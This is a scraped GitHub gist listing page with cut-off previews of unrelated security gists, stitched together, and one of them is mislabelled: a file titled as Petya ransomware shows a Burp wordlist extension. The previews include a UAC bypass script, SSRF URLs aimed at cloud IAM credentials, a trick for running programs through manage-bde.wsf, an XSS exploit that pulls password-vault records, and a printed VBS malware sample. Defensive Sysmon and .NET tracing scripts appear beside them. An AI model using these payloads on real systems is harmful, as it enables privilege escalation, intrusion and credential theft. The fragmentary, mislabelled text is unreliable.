This gist was built by the community of the researchers and was scribed by Kir and Igor from the QIWI/Vulners. We are grateful for the help of all those who sent us the data, links and information. Together we can make this world a better place!
random-robbie
/ DutchGov.txt
Last active
January 22, 2025 02:41
Dutch Gov - bug bounty scope - feel free to add more if you know they are in scope - taken from - https://www.communicatierijk.nl/vakkennis/r/rijkswebsites/verplichte-richtlijnen/websiteregister-rijksoverheid
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| http://www.rijksoverheid.nl | |
| http://www.rivm.nl | |
| http://coronadashboard.rijksoverheid.nl | |
| http://www.nederlandwereldwijd.nl | |
| http://www.government.nl | |
| http://lci.rivm.nl | |
| http://www.rvo.nl | |
| http://www.defensie.nl | |
| http://www.werkenvoornederland.nl | |
| http://www.rijkswaterstaat.nl |
netbiosX
/ FodhelperUACBypass.ps1
Last active
April 24, 2025 05:28
Bypass UAC via Fodhelper binary in Windows 10 systems
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| .SYNOPSIS | |
| This script can bypass User Access Control (UAC) via fodhelper.exe | |
| It creates a new registry structure in: "HKCU:\Software\Classes\ms-settings\" to perform UAC bypass and starts | |
| an elevated command prompt. | |
| .NOTES | |
| Function : FodhelperUACBypass | |
| File Name : FodhelperUACBypass.ps1 |
vulnersCom
/ Petya_ransomware.md
Last active
February 13, 2025 14:04
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #ch6_burp_wordlist.py | |
| from burp import IBurpExtender | |
| from burp import IContextMenuFactory | |
| from javax.swing import JMenuItem | |
| from java.util import ArrayList, List | |
| from HTMLParser import HTMLParser | |
| from datetime import datetime | |
| import re | |
| #This class attempts to strip all tags from and HTML page recieved in the http response |
jhaddix
/ cloud_metadata.txt
Last active
April 24, 2025 20:06
— forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## AWS | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/ami-id | |
| http://169.254.169.254/latest/meta-data/reservation-id | |
| http://169.254.169.254/latest/meta-data/hostname | |
| http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| I came across an interesting Windows Script File (WSF) that has been around a while called 'manage-bde.wsf'. It may be located in SYSTEM32. | |
| Though not nearly as cool as SyncAppvPublishingServer[.com/.vbs], we can 'tamper' with manage-bde.wsf to run things in unattended ways. | |
| Here are a few examples that you may or may not find useful - | |
| 1) Replace ComSpec Variable | |
| set comspec=c:\windows\system32\calc.exe | |
| cscript manage-bde.wsf |
mattifestation
/ SysmonEventGUIDParser.ps1
Last active
April 23, 2025 13:16
Extracts fields from sysmon process and logon GUIDs
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Author: Matthew Graeber (@mattifestation) | |
| $Epoch = Get-Date '01/01/1970' | |
| # Conversion trick taken from https://blogs.technet.microsoft.com/heyscriptingguy/2017/02/01/powertip-convert-from-utc-to-my-local-time-zone/ | |
| $StrCurrentTimeZone = (Get-WmiObject Win32_timezone).StandardName | |
| $TZ = [TimeZoneInfo]::FindSystemTimeZoneById($StrCurrentTimeZone) | |
| # Parse out all the LogonGUID fields for sysmon ProcessCreate events | |
| Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } | ForEach-Object { |
shawarkhanethicalhacker
/ password_vault_exploit.js
Created
August 20, 2018 07:26
XSS Exploit code for retrieving passwords stored in a Password Vault
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //Exploit Code by Shawar Khan | |
| var data_chunks = ''; | |
| // Capturing Records from API | |
| fetch('https://redacted.com/api/v3/records/all').then((resp) => resp.text()).then(function(data) { | |
| // Holds the records in as String | |
| var allrecords = data; | |
| // converting response to JSON |
mattifestation
/ CollectDotNetEvents.ps1
Created
August 27, 2018 21:50
A PoC script to capture relevant .NET runtime artifacts for the purposes of potential detections
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| logman --% start dotNetTrace -p Microsoft-Windows-DotNETRuntime (JitKeyword,NGenKeyword,InteropKeyword,LoaderKeyword) win:Informational -o dotNetTrace.etl -ets | |
| # Do your evil .NET thing now. In this example, I executed the Microsoft.Workflow.Compiler.exe bypass | |
| # logman stop dotNetTrace -ets | |
| # This is the process ID of the process I want to capture. In this case, Microsoft.Workflow.Compiler.exe | |
| # I got the process ID by running a procmon trace | |
| $TargetProcessId = 8256 |
JohnLaTwC
/ fd334bb96b496592db6c9771f305a2ddca6610a59c6d45f5bbbb2b38859b4f36
Created
October 20, 2018 00:20
VBS
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## Uploaded by @JohnLaTwC | |
| ## Sample hash: fd334bb96b496592db6c9771f305a2ddca6610a59c6d45f5bbbb2b38859b4f36 | |
| On Error Resume Next | |
| Dim objShell : Set objShell = CreateObject("WScript.Shell") | |
| If LCase(Right(WScript.FullName, 11)) = "wscript.exe" Then | |
| For Each vArg In WScript.Arguments | |
| sArgs = sArgs & " """ & vArg & """" | |
| Next | |
| objShell.Run("cmd.exe /k cscript.exe //nologo " & Chr(34) & WScript.ScriptFullName & Chr(34) & sArgs & " && exit") |